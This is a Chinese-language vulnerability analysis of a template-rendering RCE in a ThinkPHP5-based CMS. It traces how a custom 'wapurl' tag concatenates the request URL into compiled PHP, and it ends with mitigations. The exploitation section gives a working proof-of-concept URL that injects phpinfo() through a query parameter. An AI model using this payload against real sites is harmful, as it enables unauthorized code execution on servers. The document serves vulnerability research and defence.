ThinkPHP CMS 模板渲染导致RCE漏洞分析<\/h1>

0x01 前置知识<\/h2>

模板渲染机制<\/h3>
模板渲染是网站开发中常用技术，实现动态生成页面内容<\/li>
ThinkPHP中使用\think\View<\/code>类的fetch<\/code>方法进行模板渲染<\/li>
可通过自定义模板引擎标签扩展和定制渲染标签<\/li>
<\/ul>
模板编译过程<\/h3>

由compiler进行编译<\/li>
解析模板文件中的模板标签语法为PHP可执行代码<\/li>
生成PHP文件并执行<\/li>
<\/ol>
TagLib(标签库)作用<\/h3>

提供自定义和扩展模板引擎标签的机制<\/li>
允许开发者定义自己的模板标签<\/li>
通过继承TagLib<\/code>类实现自定义标签<\/li>
<\/ul>
0x02 漏洞分析<\/h2>
漏洞环境<\/h3>

基于ThinkPHP5开发的CMS系统<\/li>
配置中使用了自定义标签库<\/li>
<\/ul>
关键调用栈<\/h3>
TagLib.php:181, think\template\TagLib->parseTag()
Template.php:685, think\Template->parseTagLib()
Template.php:397, think\Template->parse()
Template.php:333, think\Template->compiler()
Template.php:182, think\Template->fetch()
Think.php:86, think\view\driver\Think->fetch()
View.php:163, think\View->fetch()
Controller.php:120, think\Controller->fetch()
Index.php:16, app\wap\controller\Index->index()
App.php:343, ReflectionMethod->invokeArgs()
App.php:343, think\App::invokeMethod()
App.php:611, think\App::module()
App.php:457, think\App::exec()
App.php:139, think\App::run()
start.php:19, require()
index.php:8, {main}()
<\/code><\/pre>
漏洞点分析<\/h3>

parseTag<\/code>方法处理闭合标签和自闭合标签<\/li>
在app\/wap\/taglib\/Yunu.php<\/code>中查找close<\/code>值为0的标签(自闭合标签)<\/li>
发现tagConfig<\/code>方法中存在可控参数<\/li>
wapurl<\/code>标签调用get_wapurl<\/code>获取当前页面URL<\/li>
最终将URL拼接到PHP代码中<\/li>
<\/ol>
关键代码<\/h3>
\/\/ 获取URL并拼接
<\/span><\/span><\/span><\/span>$confstr =<\/span> get_wapurl<\/span>();
<\/span><\/span>\/\/ 拼接PHP代码
<\/span><\/span><\/span><\/span>$result =<\/span> '<?php echo "'<\/span>.<\/span>$confstr.<\/span>'"; ?>'<\/span>;
<\/span><\/span><\/code><\/pre>0x03 漏洞利用<\/h2>
利用条件<\/h3>

使用<yunu:config name='wapurl'<\/code>标签的模板文件<\/li>
模板文件位于wap\/index_index.html<\/code><\/li>
<\/ol>
利用步骤<\/h3>

构造Payload:<\/li>
<\/ol>
http:\/\/127.0.0.1\/index.php?s=wap\/index\/index&asdasd=aa";phpinfo();\/\/
<\/code><\/pre>

注意浏览器会自动URL编码，需使用Burp或Yakit等工具直接发送原始请求<\/li>
<\/ol>
防护措施<\/h3>

对用户输入进行严格过滤<\/li>
避免直接将用户输入拼接到PHP代码中<\/li>
使用安全的模板渲染方式<\/li>
更新到最新版本的框架<\/li>
<\/ol>
总结<\/h2>
该漏洞源于ThinkPHP CMS在模板渲染过程中，对用户输入处理不当，导致攻击者可通过精心构造的URL实现远程代码执行。开发人员应特别注意模板渲染过程中的用户输入处理，避免直接将用户可控数据拼接到可执行代码中。<\/p>